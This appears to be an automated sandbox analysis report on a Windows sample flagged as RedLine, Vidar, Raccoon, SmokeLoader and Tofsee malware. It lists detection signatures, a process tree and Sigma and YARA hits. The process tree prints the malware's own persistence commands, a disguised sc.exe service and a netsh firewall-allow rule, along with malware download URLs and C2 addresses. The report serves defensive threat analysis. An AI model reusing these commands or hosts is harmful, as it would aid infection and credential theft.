Loading ...

Play interactive tourEdit tour

Windows Analysis Report NNOKmCIVoi.exe

Overview

General Information

Sample Name:NNOKmCIVoi.exe
Analysis ID:551246
MD5:31a601a28f4a81a69c9b09d7249582b9
SHA1:7aa415965720f2c794fd44a4f147dd7fa756b9b8
SHA256:4a74dbaaacb20b26d7237b74ced5bd105b0ff3e2eb3ece3eba7bb93bf224b853
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NNOKmCIVoi.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\NNOKmCIVoi.exe" MD5: 31A601A28F4A81A69C9B09D7249582B9)
    • NNOKmCIVoi.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\NNOKmCIVoi.exe" MD5: 31A601A28F4A81A69C9B09D7249582B9)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • cmd.exe (PID: 1000 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdysgoc\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5220 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5828 cmdline: C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5796 cmdline: C:\Windows\System32\sc.exe" description hdysgoc "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5840 cmdline: "C:\Windows\System32\sc.exe" start hdysgoc MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 5160 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3412.exe (PID: 2196 cmdline: C:\Users\user\AppData\Local\Temp\3412.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 454.exe (PID: 1544 cmdline: C:\Users\user\AppData\Local\Temp\454.exe MD5: 733045B137714FDD39BF6F9C6C063134)
        • 12CC.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\Temp\12CC.exe MD5: 42F7FCDEACB40167D32D7CA782CE9169)
        • 2655.exe (PID: 2884 cmdline: C:\Users\user\AppData\Local\Temp\2655.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 2655.exe (PID: 1316 cmdline: C:\Users\user\AppData\Local\Temp\2655.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
            • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 8 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 8F03.exe (PID: 6524 cmdline: C:\Users\user\AppData\Local\Temp\8F03.exe MD5: 27F38096E53A91C525B0700700CEE4C4)
        • A7DB.exe (PID: 6620 cmdline: C:\Users\user\AppData\Local\Temp\A7DB.exe MD5: C388DB9CA136D19310B76EF81E54FC12)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6700 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6800 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6896 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6972 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7000 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1552 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6308 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • eugcwgv (PID: 484 cmdline: C:\Users\user\AppData\Roaming\eugcwgv MD5: 31A601A28F4A81A69C9B09D7249582B9)
    • eugcwgv (PID: 1100 cmdline: C:\Users\user\AppData\Roaming\eugcwgv MD5: 31A601A28F4A81A69C9B09D7249582B9)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6388 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1316 -ip 1316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • qflfaqod.exe (PID: 4380 cmdline: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d"C:\Users\user\AppData\Local\Temp\12CC.exe" MD5: D87304ADE23471353A7A95FEF9256AC6)
    • svchost.exe (PID: 1940 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000001.00000002.319704105.0000000002161000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0000002B.00000002.487901560.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000019.00000002.420370458.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
                Click to see the 30 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.NNOKmCIVoi.exe.4715a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  1.1.NNOKmCIVoi.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    41.2.qflfaqod.exe.d40e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      25.2.12CC.exe.2090e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                        25.2.12CC.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                          Click to see the 16 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d"C:\Users\user\AppData\Local\Temp\12CC.exe", ParentImage: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe, ParentProcessId: 4380, ProcessCommandLine: svchost.exe, ProcessId: 1940
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6648, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\, ProcessId: 5220
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 6648
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6648, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5160
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6648, ProcessCommandLine: C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5828
                          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 6648

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002F.00000002.526432273.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.545472063.0000000004860000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.462885844.0000000004990000.00000004.00000001.sdmp, type: MEMORY
                          Antivirus detection for URL or domainShow sources
                          Source: http://78.46.160.87/vcruntime140.dllAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9993_1641737702_2517.exeAvira URL Cloud: Label: malware
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://78.46.160.87/freebl3.dllAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/game.exeAvira URL Cloud: Label: malware
                          Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                          Source: http://78.46.160.87/mozglue.dllAvira URL Cloud: Label: malware
                          Source: http://78.46.160.87/softokn3.dllAvira URL Cloud: Label: malware
                          Source: https://noc.social/@banda5kerAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://78.46.160.87/565Avira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\8F03.exeAvira: detection malicious, Label: TR/AD.StellarStealer.rfurr
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: NNOKmCIVoi.exeVirustotal: Detection: 32%Perma Link
                          Source: NNOKmCIVoi.exeReversingLabs: Detection: 65%
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeReversingLabs: Detection: 67%
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\8F03.exeMetadefender: Detection: 37%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\8F03.exeReversingLabs: Detection: 83%
                          Source: C:\Users\user\AppData\Roaming\eugcwgvReversingLabs: Detection: 65%
                          Machine Learning detection for sampleShow sources
                          Source: NNOKmCIVoi.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\qflfaqod.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8F03.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\eugcwgvJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\D78A.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\C71D.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\A7DB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeJoe Sandbox ML: detected
                          Source: 41.2.qflfaqod.exe.d40e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 25.2.12CC.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 24.3.454.exe.570000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 25.2.12CC.exe.2090e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 41.3.qflfaqod.exe.d60000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 25.3.12CC.exe.20b0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.454.exe.550e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 41.2.qflfaqod.exe.da0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 41.2.qflfaqod.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeUnpacked PE file: 24.2.454.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeUnpacked PE file: 25.2.12CC.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeUnpacked PE file: 41.2.qflfaqod.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeUnpacked PE file: 41.2.qflfaqod.exe.400000.0.unpack
                          Source: NNOKmCIVoi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49809 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49868 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49871 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.5:49875 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49882 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.5:49890 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.5:49906 version: TLS 1.2
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 3412.exe, 00000014.00000000.368430619.0000000000413000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.359444132.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000017.00000002.423473511.00000000052B0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000017.00000003.373977412.0000000003115000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.373926704.0000000004EA7000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.374942488.0000000003115000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000017.00000003.373965754.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.375650861.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: C:\teka.pdb source: 454.exe, 00000018.00000000.379254398.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: q=C:\teka.pdb source: 454.exe, 00000018.00000000.379254398.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: C:\mimij 32_yowixeye-cepocud.pdb source: NNOKmCIVoi.exe, 00000000.00000000.247355043.0000000000413000.00000002.00020000.sdmp, NNOKmCIVoi.exe, 00000000.00000002.255140109.0000000000413000.00000002.00020000.sdmp, NNOKmCIVoi.exe, 00000001.00000000.253750901.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000012.00000000.350292520.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000012.00000002.364345797.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000013.00000000.358288557.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: C:\fav.pdb source: 12CC.exe, 00000019.00000000.390461796.0000000000413000.00000002.00020000.sdmp, 12CC.exe, 00000019.00000002.420476884.0000000000415000.00000002.00020000.sdmp, qflfaqod.exe, 00000029.00000002.430175113.0000000000415000.00000002.00020000.sdmp, qflfaqod.exe, 00000029.00000000.420866435.0000000000413000.00000002.00020000.sdmp
